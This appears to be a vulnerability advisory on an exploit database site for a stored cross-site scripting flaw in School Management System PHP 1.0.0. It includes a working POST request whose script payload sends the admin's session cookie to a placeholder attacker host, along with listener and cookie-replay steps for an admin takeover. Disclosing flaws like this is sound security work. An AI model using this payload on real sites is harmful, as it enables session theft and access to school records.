Vulners
Lucene search
📄 School Management System PHP 1.0.0 Cross Site Scripting
====================================================
School Management System PHP - Stored XSS leading to Admin Account Takeover
====================================================
Author: Mehmet Utku Köken
Date: 2026-04-28
CVE: N/A
Vendor Homepage: https://github.com/codingWithElias/school-management-system-php
Version: 1.0.0 (commit f1ac334)
Tested on: Windows 10 / XAMPP / PHP 8.x
Category: Webapps
Platform: PHP
== Description ==
A Stored Cross-Site Scripting (XSS) vulnerability exists in
School Management System PHP. The contact form located at
/req/contact.php fails to sanitize the full_name and message
parameters before storing them in the database. When an
administrator views the messages panel at /admin/message.php,
the stored payload executes within the admin's browser context.
This allows an unauthenticated attacker to steal the admin
session cookie and perform a full account takeover.
== Affected Parameters ==
- full_name
- message
== Affected Files ==
- /req/contact.php (unsanitized input stored)
- /admin/message.php (payload execution)
== Steps to Reproduce ==
1. Navigate to the contact form:
http://TARGET/school-management-system-php/
2. Intercept the POST request and inject the payload
into the full_name or message parameter:
POST /school-management-system-php/req/contact.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
[email protected]&full_name=<script>new Image().src='http://ATTACKER:8888/?c='+document.cookie</script>&message=hello
3. Start a listener on the attacker machine:
python3 -m http.server 8888
4. Wait for the administrator to visit the messages panel:
http://TARGET/school-management-system-php/admin/message.php
5. The attacker's listener receives the admin session cookie:
GET /?c=PHPSESSID=ao7emtlus8bf87dkpumutl4v3q HTTP/1.1
6. Use the captured session cookie to access the admin panel
without credentials by setting:
Cookie: PHPSESSID=ao7emtlus8bf87dkpumutl4v3q
Then navigate to:
http://TARGET/school-management-system-php/admin/
== Impact ==
An unauthenticated attacker can submit a malicious payload
via the public contact form. Once the administrator views
the messages, the attacker receives the admin PHPSESSID and
gains full administrative access to the application including
student records, teacher data and system configuration.
== References ==
https://owasp.org/www-community/attacks/xss/
https://github.com/codingWithElias/school-management-system-phpData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Apr 2026 00:00Current
5Medium risk
Vulners AI Score5